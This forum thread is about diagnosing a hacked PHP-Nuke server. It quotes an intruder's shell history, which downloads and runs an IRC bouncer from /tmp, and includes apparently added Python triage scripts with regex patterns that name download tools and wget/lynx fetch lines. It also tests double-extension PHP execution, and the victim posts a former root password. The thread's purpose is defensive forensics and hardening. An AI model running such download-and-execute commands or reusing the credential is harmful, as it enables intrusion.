My home server was hacked and I can't find the way used to hack it.
I inspected the root's .bash_history and found these:
Quote:
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget [link hidden by forum]
lynx -source [link hidden by forum] > psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget [link hidden by forum]
lynx -source [link hidden by forum] > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget [link hidden by forum]
lynx -source [link hidden by forum] > psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source [link hidden by forum] > psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source [link hidden by forum] > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin
Could anyone help me to find the vulnerability???
I use phpnuke 7.4 and my server is a Debian stable.
I have the log files in /var/log and I see that the file psyBNC2.3.2-4.tar.gz was created on May 1.
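The history above is the classic "drop a bouncer in /tmp" sequence. As an added triage example (not code from the thread), the script below tags each line of a recovered .bash_history with what it indicates: recon, a root password change, downloads into a world-writable directory, archive extraction, chmod 777, clean-up, and kills of other intruders' bots. The sample history is constructed from the lines posted above, with the URLs the forum hid replaced by the placeholder host example.invalid; the tag names and regexes are my own.

```python
"""Tag lines of a recovered .bash_history with the behaviour they indicate.
Added example, not from the original post. SAMPLE_HISTORY is constructed
from the posted lines; URLs use the placeholder host example.invalid."""
import re
from typing import Dict, List, Tuple

# Constructed sample (subset of the posted history, URLs replaced).
SAMPLE_HISTORY = """\
id
uname -a
passwd root
/sbin/ifconfig
cd /tmp
wget http://example.invalid/psyBNC2.3.2-4.tar.tar
lynx -source http://example.invalid/psybnc.tgz > psybnc.tgz
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
make;pico psybnc.conf;./psybnc
chmod 777 psybnc
rm -vr psyBNC2.3.2-4.tar.tar
ps -aux
killall -9 bindz
killall -9 r0nin
cd ...
./run "dev" ./uptime
ls
"""

# (tag, regex) pairs; a line may receive several tags.
RULES: List[Tuple[str, re.Pattern]] = [
    ("credential-change", re.compile(r"^\s*passwd\b")),
    ("recon", re.compile(r"^\s*(id|uname|uptime|/sbin/ifconfig|ifconfig|ps)\b")),
    ("download", re.compile(r"\b(wget|curl|lynx\s+-source|fetch)\b")),
    ("world-writable-dir", re.compile(r"\b(cd\s+)?/(var/)?tmp\b")),
    ("archive-extract", re.compile(r"\btar\s+-?[a-z]*x")),
    ("permission-loosen", re.compile(r"\bchmod\s+[0-7]*7{2,3}\b")),
    ("cleanup", re.compile(r"\brm\s+-[a-z]*r")),
    ("kill-process", re.compile(r"\bkill(all)?\s+-9\b")),
    ("hidden-dir", re.compile(r"\bcd\s+\.{3,}\s*$")),   # e.g. a directory named "..."
    ("exec-local", re.compile(r"(^|;|\s)\./[\w.-]+")),  # running a binary from the cwd
]


def triage(history: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_number, command, tags) for every line that matched a rule."""
    findings = []
    for n, line in enumerate(history.splitlines(), 1):
        tags = [tag for tag, rx in RULES if rx.search(line)]
        if tags:
            findings.append((n, line, tags))
    return findings


def summarize(history: str) -> Dict[str, int]:
    """Count hits per tag. Downloads into /tmp plus chmod 777 plus kills of
    unfamiliar process names is the usual sign of a dropped IRC bot/bouncer."""
    counts: Dict[str, int] = {}
    for _, _, tags in triage(history):
        for t in tags:
            counts[t] = counts.get(t, 0) + 1
    return counts


def killed_process_names(history: str) -> List[str]:
    """Names passed to 'killall -9': on a compromised host these are often
    other intruders' bots (here bindz and r0nin), worth searching the disk for."""
    names = []
    for line in history.splitlines():
        m = re.match(r"\s*killall\s+-9\s+(\S+)", line)
        if m:
            names.append(m.group(1))
    return names


if __name__ == "__main__":
    for n, cmd, tags in triage(SAMPLE_HISTORY):
        print(f"{n:3d}  {', '.join(tags):30s} {cmd}")
    print("summary:", summarize(SAMPLE_HISTORY))
    print("processes killed:", killed_process_names(SAMPLE_HISTORY))
```

The history only shows what the attacker did after getting a shell; the tags point at what to check next (file creation times under /tmp and /var/tmp, the processes named in killall, and the web server logs for the upload that preceded the first `id`).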
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted: Thu Jun 01, 2006 7:14 am
Doubtful this was hacked because of PHP-Nuke unless you used the same user IDs and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user-level access to the server (or was it root access?).
If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. Don't know how to do that, but I know it is possible in most *nix environments.
I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...
Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above...
Some of you might find this interesting! I posted it the other day on another web site...
==============================
To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...
Create a plain text file containing the following code:
Code:
<?php print 'Oops! If you can read this, your web server is vulnerable to attack!'; ?>
Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.
Then, run it in your browser by entering the URL in the browser's addy bar, i.e. [link hidden by forum]
If the page shows the message:
Quote:
Oops! If you can read this, your web server is vulnerable to attack!
...you should be alarmed!
If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...
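Why the vindsl.php.rar test works: Apache's mod_mime treats every dot-separated part of a filename after the first as an extension, so with the PHP handler bound by a plain AddHandler/AddType line, vindsl.php.rar is executed exactly like vindsl.php, and an upload filter that only checks the last extension is bypassed. The audit helper below is an added example, not code from the thread: it mirrors that extension logic so you can check filenames offline and scan an upload directory for disguised scripts. The extension set is an assumption; compare it with the AddHandler/AddType lines in your own httpd.conf or .htaccess.

```python
"""Find filenames that Apache would hand to the PHP handler although their
final extension looks harmless (the vindsl.php.rar case). Added example, not
from the thread; PHP_EXTENSIONS is an assumption about the server's config."""
import os
from typing import Iterable, List

# Extensions commonly mapped to PHP via AddHandler/AddType (assumption).
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml"}


def apache_extensions(filename: str) -> List[str]:
    """Mirror mod_mime: split the basename on '.', drop the leading name part,
    and treat every remaining part as an extension (case-insensitive)."""
    base = os.path.basename(filename)
    return [p.lower() for p in base.split(".")[1:] if p]


def served_as_php(filename: str, php_exts=PHP_EXTENSIONS) -> bool:
    """True if ANY extension in the name selects the PHP handler under a plain
    AddHandler mapping; 'vindsl.php.rar' and 'x.php' both return True."""
    return any(ext in php_exts for ext in apache_extensions(filename))


def disguised_scripts(paths: Iterable[str]) -> List[str]:
    """From relative paths, keep those whose LAST extension is not PHP but
    which would still execute as PHP: the upload-filter bypass the test shows."""
    out = []
    for p in paths:
        exts = apache_extensions(p)
        if exts and exts[-1] not in PHP_EXTENSIONS and served_as_php(p):
            out.append(p)
    return out


def scan_tree(root: str) -> List[str]:
    """Walk a web root or upload directory and report disguised scripts."""
    found = []
    for dirpath, _, files in os.walk(root):
        rel = [os.path.relpath(os.path.join(dirpath, f), root) for f in files]
        found.extend(disguised_scripts(rel))
    return sorted(found)


if __name__ == "__main__":
    for name in ("vindsl.php.rar", "photo.jpg", "shell.php.jpg", "php.ini"):
        print(f"{name:16s} runs as PHP: {served_as_php(name)}")
```

If the test page printed the message, the fix on the Apache side is to bind the handler only to names that end in .php, for example with a `<FilesMatch "\.php$">` block containing `SetHandler application/x-httpd-php` instead of an AddType/AddHandler line, and to turn the PHP engine off in directories that only hold uploads (`php_admin_flag engine off` inside a `<Directory>` block). Run `scan_tree` over the gallery upload directory to see whether anything of that shape was left behind.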
kguske: yes, this is a needle in a very large haystack, for me!
montego:
Quote:
you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server
Yes! I have a general user on my server with the same username and password that I was using in Nuke.
Quote:
This guy somehow got your root password?
Yes, the guy got my root password. My root pass was a very, um, common pass. It was: DP83905AVQB. I suppose that he did a reverse connection with an IRC script and gained access to an Apache shell script and did the command "passwd" and changed the root password. For me, he didn't discover my root password.
Quote:
If you do not have to access your server remotely (...), then you may want to disable remote user login
Yes, I have a keyboard, monitor and mouse connected. But my server was in another place, so I need to connect to it by SSH. But, as I wrote above, I suppose that the guy did a reverse connection!!!! This is the problem: how do I block reverse connections and how do I block access to the Apache shell???
VinDSL
Quote:
I'd disable wget and lynx!!!
Yes, I will uninstall these two applications.
Quote:
Then, away they went...
Yes, I am sure that he went!
Quote:
Make sure your server is recognizing the MIMEs mentioned above, such as:
I am sorry, but what are you suggesting to me?? Where do I find/modify this? In httpd.conf? I am sorry, but my English is very poor!!!
I am very interested, to prevent and to learn, in how the guy gained access to my shell???
I suppose that he uploaded the rootkit to a dir with write permission in the My eGallery module!!! So I would like to discover it, or confirm it or not...
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted: Fri Jun 02, 2006 6:22 am
Quote:
I suppose that he uploaded the rootkit to a dir with write permission in the My eGallery module!!! So I would like to discover it, or confirm it or not...
The only way to confirm this, I think, is through your Apache logs.
I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.
I tried your test of vindsl.php.rar and, sad to say, it failed. So I added the MIME types in my .htaccess file but it did not do anything. I checked on the Apache site and could not find anything else to do; is there some trick?
Joined: May 18, 2005 Posts: 119 Location: SVCDPlaza
Posted: Fri Jun 09, 2006 4:08 am
On SUSE you can put the mime_magic module in APACHE_MODULES in the file /etc/sysconfig/apache2.
The MIME type goes in the file /etc/mime.types.
Restart Apache and it will work.
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted: Fri Jun 09, 2006 6:24 am
marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:
Code:
// MODULE_FILE is defined by Nuke's modules.php before it includes a module;
// a direct request to this script will not have it set.
if ( !defined('MODULE_FILE') )
{
die("You can't access this file directly...");
}
This would prevent these direct access attempts; however, I am not 100% sure whether this would cause issues with the operation of the tool, if they wrote it to work within the nuke "structure", meaning everything comes in through modules.php or admin.php.
Another possible "killer" to this is: if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, then you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.
Unfortunately, although nuke has had many holes which have needed patching over the years, it is only as strong as its weakest link, and if you throw in a module that has "holes" then immediately your whole nuke site is vulnerable.
I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!